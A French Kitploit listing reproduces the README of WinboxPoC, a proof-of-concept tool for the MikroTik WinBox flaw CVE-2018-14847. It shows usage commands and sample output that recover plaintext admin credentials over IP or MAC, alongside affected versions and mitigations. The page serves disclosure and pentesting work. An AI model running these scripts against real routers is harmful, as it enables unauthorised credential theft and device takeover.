Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WinboxPoC — Preuve de concept de la vulnérabilité critique de Winbox (CVE-2018-14847) | Kitploit
Outils/GitHubGitHub/basucert/winboxpoc
Attaques de Mots de PasseAnalyse des VulnérabilitésExploitationCollecte d'InformationsSécurité RéseauTests d'IntrusionArchived
GitHubbasucert/winboxpoc

WinboxPoC

Preuve de concept de la vulnérabilité critique de Winbox (CVE-2018-14847)

Voir le dépôt
520461il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

WinboxExploit

Ceci est une preuve de concept de la vulnérabilité critique WinBox (CVE-2018-14847) qui permet la lecture arbitraire de fichiers contenant des mots de passe en texte clair.

La vulnérabilité a été corrigée depuis longtemps, ce projet est donc terminé et ne sera plus supporté ni mis à jour. Vous pouvez le forker et le mettre à jour vous-même.

Article de blog

https://n0p.me/winbox-bug-dissection/

Prérequis

  • Python 3+

Ce script ne fonctionnera PAS avec Python 2.x ou inférieur.

Comment utiliser

Le script s'utilise simplement avec des arguments simples en ligne de commande.

WinBox (TCP/IP)

Exploitez la vulnérabilité et lisez le mot de passe.

root@kitploit:~
python3 WinboxExploit.py <ADRESSE-IP> [PORT]

Exemple :

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connecté à 172.17.17.17:8291
Exploit réussi
Utilisateur : admin
Mot de passe : Th3P4ssWord

Serveur MAC WinBox (Couche 2)

Vous pouvez extraire des fichiers même si l'appareil n'a pas d'adresse IP.

Vérification simple de découverte des appareils Mikrotik connectés localement.

root@kitploit:~
python3 MACServerDiscover.py

Exemple :

root@kitploit:~
$ python3 MACServerDiscover.py
Recherche d'appareils Mikrotik (serveurs MAC)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

Exploitez la vulnérabilité et lisez le mot de passe.

root@kitploit:~
python3 MACServerExploit.py <ADRESSE-MAC>

Exemple :

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

Utilisateur : admin
Mot de passe : Th3P4ssWord

Versions vulnérables

Toutes les versions de RouterOS du 28/05/2015 au 20/04/2018 sont vulnérables à cet exploit.

Appareils Mikrotik exécutant les versions RouterOS :

  • Longterm : 6.30.1 - 6.40.7
  • Stable : 6.29 - 6.42
  • Beta : 6.29rc1 - 6.43rc3

Pour plus d'informations, voir : https://blog.mikrotik.com/security/winbox-vulnerability.html

Techniques d'atténuation

  • Mettez à niveau le routeur vers une version de RouterOS incluant le correctif.
  • Désactivez le service WinBox sur le routeur.
  • Vous pouvez restreindre l'accès au service WinBox à des adresses IP spécifiques avec la commande suivante :
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • Vous pouvez utiliser des règles de filtrage (ACL) pour refuser l'accès externe au service WinBox :
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • La limitation de l'accès au service mac-winbox peut être effectuée en spécifiant les interfaces autorisées :
root@kitploit:~
/tool mac-server mac-winbox

Droits d'auteur

  • Sponsoré par le CERTCC d'Iran (https://certcc.ir). Tous droits réservés.
Télécharger l’outil